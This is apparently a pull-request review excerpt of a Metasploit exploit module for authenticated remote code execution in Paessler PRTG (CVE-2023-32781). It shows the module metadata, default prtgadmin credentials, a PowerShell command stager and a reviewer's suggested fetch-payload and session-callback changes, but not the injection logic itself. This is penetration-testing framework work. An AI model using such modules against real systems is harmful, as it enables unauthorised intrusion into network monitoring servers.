modules/exploits/windows/http/prtg_authenticated_rce_cve_2023_32781.rb

```diff
@@ -0,0 +1,343 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Retry
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PRTG CVE-2023-32781 Authenticated RCE',
+        'Description' => %q{
+          Authenticated RCE in Paessler PRTG
+        },
+        'License' => MSF_LICENSE,
+        'Author' => ['Kevin Joensen <kevin[at]baldur.dk>'],
+        'References' => [
+          [ 'URL', 'https://baldur.dk/blog/prtg-rce.html'],
+          [ 'CVE', '2023-32781']
+        ],
+        'DisclosureDate' => '2023-08-09',
+        'Platform' => 'win',
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          [
+            'Windows',
+            {
+              'Arch' => [ ARCH_X64, ARCH_X86 ],
+              'Platform' => 'win',
+              'CmdStagerFlavor' => [ 'psh_invokewebrequest' ]
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new(
+          'USERNAME',
+          [ true, 'The username to authenticate with', 'prtgadmin' ]
+        ),
+        OptString.new(
+          'PASSWORD',
+          [ true, 'The password to authenticate with', 'prtgadmin' ]
+        ),
+        OptString.new(
+          'TARGETURI',
+          [ true, 'The URI for the PRTG web interface', '/' ]
+        )
+      ]
+    )
+  end
+
+  def check
+    CheckCode::Vulnerable
+  end
+
+  def exploit
+    $sensors_to_delete = []
+
+    connect
+
+    execute_cmdstager(flavor: :psh_invokewebrequest)
+
+    retry_until_truthy(timeout: 15) do
+      session_created?
+    end
+
+    print_good("Session created")
+    $sensors_to_delete.each {|sensor_id|
+      delete_sensor_by_id(sensor_id)
+    }
+
```

Comment:
This will allow the execution of a fetch payload.  I also replaced the active session searching for a method we have that's called when a session is created, so you don't need to poll all the time, anymore.

```suggestion
  def exploit
    @sensors_to_delete = []

    connect
    case target['Type']
    when :win_cmdstager
      execute_cmdstager
    when :win_fetch
      execute_command(payload.encoded)
    end
  end

  def on_new_session(client)
    super
    @sensors_to_delete.each {|sensor_id|
      delete_sensor_by_id(sensor_id)
    }
    print_good("Session created")
  end

```